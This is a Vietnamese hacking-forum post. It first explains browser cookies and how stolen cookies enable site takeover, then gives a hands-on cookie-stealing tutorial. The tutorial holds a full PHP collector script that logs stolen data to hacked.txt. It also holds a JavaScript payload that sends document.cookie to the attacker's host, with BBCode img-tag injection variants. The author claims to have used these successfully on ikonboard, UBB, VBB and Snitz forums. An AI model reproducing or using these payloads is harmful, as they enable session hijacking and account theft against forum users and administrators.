Messages posted by: legendayhacker

--------------------------------------------------------------------------------

Hack dùng Cookie :

1. Giới thiệu về cookie
cookie là những phần dữ liệu nhỏ có cấu trú được chia sẻ giữa web site và browser của người dùng. cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua trong site. Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen...
cookie được browser của người dùng chấp nhận lưu trên đĩa cứng của máy mình, ko phải browser nào cũng hỗ trợ cookie. Sau một lần truy cập vào site, những thông tin về người dùng được lưu trữ trong cookie. Ở những lần truy cập sau đến site đó, web site có thể dùng lại những thông tin trong cookie (như thông tin liên quan đến việc đăng nhập vào 1 forum...) mà người ko phải làm lại thao tác đăng nhập hay phải nhập lại các thông tin khác. Vấn đề đặt ra là có nhiều site quản lý việc dùng lại các thông tin lưu trong cookie ko chính xác, kiểm tra ko đầy đủ hoặc mã hoá các thông tin trong cookie còn sơ hở giúp cho hacker khai thác để vượt qua cánh cửa đăng nhập, đoạt quyền điêu khiển site; cũng có nhiều site sử dụng những thông tin cá nhân của người dùng để phục vụ cho các mục đích khác như quảng cáo, hoặc thậm chí bán thông tin của người dùng cho khách hàng khác (vd: nếu đột nhiên bạn nhận vài email quảng cáo mỗi ngày được gửi vào mail box của bạn mà ko biết tại sao, thì có thể là thông tin cá nhân của bạn đã bị một site nào đó mà bạn từng xem sử dụng)
2. Các thành phần của cookie
Tên: do người lập trình web site chọn
Domain: là tên miền từ server mà cooki e được tạo và gửi đi
Đường dẫn: thông tin về đường dẫn ở web site mà bạn đang xem
Ngày hết hạn: là thời điểm mà cookie hết hiệu lực\
Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ đựơc mã hoá trong quá trình truyền giữa server và browser.
Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để nhận dạng về sau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy và bị giới hạn trong khoảng 4k.

cookies của Netscape (NS) đặt trong file cooki s.txt, trong thư mục cài đặt NS \Users\default (hoặc \User\Yourname), còn của IE thường đặt trong \Documents and Settings\Username\cookies\username@sitename.txt. (đối với win9x, thư mục cookies nằm trong thư mục Windows/cookies)

Netscape là trình duyệt đầu tiên sử dụng cookie, kế đến là IE của microsoft.
Các thông tin khác về cookie thêm về cookie, các bạn có thể tham khảo thêm ở http://www.cooki_ecentral.com/ (bỏ gạch dưới ở giữa)

3. Khai thác cookie
Ưu điểm của việc sử dụng cookie đã rõ ràng, việc lưu trữ và dùng lại các thông tin đăng nhập sẽ giúp người dùng tiết kiệm thời gian trong việc duyệt các web site. Tuy nhiên, bên cạnh những lợi ích của nó. cookie là một trong những nguyên nhân gây tiết lộ thông tin riêng tư của người dùng. Những người biết tận dụng những thông tin này có thể gây nên những hậu quả nghiêm trọng. VD: một hacker làm việc ở một ngân hàng có thể tìm cách xem thông tin trong cookie của khách hàng và sử dụng thông tin này để truy cập vào acc của khách hàng đó. Hoặc hacker có thể tìm cách trộm cookie của admin 1 website và từ đó có thể dễ dàng chiếm được quyền điều khiển site.
Những browser hiện nay cho phép người dùng khóa cookie hoặc hỏi họ trước khi lưu lại cookie trên hệ thống. Cũng có nhiều software giúp người dùng quản lý tốt cookie, giúp ngăn chặn hoặc cảnh báo những nguy cơ có thể gây hại.

Tác giả: W_Hat (Z0rr0)
---------------------------------------------

--------------------------------------------------------------------------------

Tác giả : W_Hat (Z0rr0)
Tôi sẽ hướng dẫn cho các bạn một vài source code ðơn giản trước ðây tôi

dùng ðể lấy cookies :

Các bạn save ðoạn code sau thành file docs.php, sau ðó upload lên 1 host nào

ðó support php. Mục ðích của ðoạn code này là sẽ ðọc data truyền vào khi gọi

file docs.php, save thành file text với tên file là hacked.txt :
Trích dẫn:
//Begin of docs.php

<?php

define ("LINE", "\r\n");

define ("HTML_LINE", "<br>");

function getvars($arr, $title)

{

$res = "";

$len = count($arr);

if ($len>0)

{

if (strlen($title)>0)

{

print("[--------$title--------]" . HTML_LINE);

$res .= "[--------$title--------]" . LINE;

}

foreach ($arr as $key => $value)

{

print("[$key]" . HTML_LINE);

print($arr[$key] . HTML_LINE);

$res .= "[$ key]" . LINE . $arr[$key] . LINE;

}

}

return $res;

}

// get current date

$now = date("Y-m-d H : i : s ");

// init

$myData = "[-----$now-----]" . LINE;

// get

$myData .= getvars($HTTP_GET_VARS, "");

// file

$file = "hacked.txt";

$mode = "r+";

if (!file_exists($file))

$mode = "w+";

$fp = fopen ($file, $mode);

fseek($fp, 0, SEEK_END);

fwrite($fp, $myData);

fclose($fp);

?>

//end of docs.php

Còn ðây là ðoạn script dùng ðể lấy cookies::

document.write('<img src=http://địa chỉ website/docs.php?docs='+escape

(document.cookie)+'>')

Ví dụ : khi áp dụng trong tag img, ta dùng như sau:

[img]java script: Document.write('<img src=http://địa chỉ website/docs.php?

docs='+escape(document.cookie)+'>')[/img]

hoặc:

[img]java script: Document.write('<img src=http:// địa chỉ

website/docs.php?docs='+escape(document.cookie)+'>')[/img]

Các này tôi từng áp dụng rất thành công trên nhiều forum ikonboard, UBB,

VBB, Snitz (tất nhiên là nếu chưa fixed )...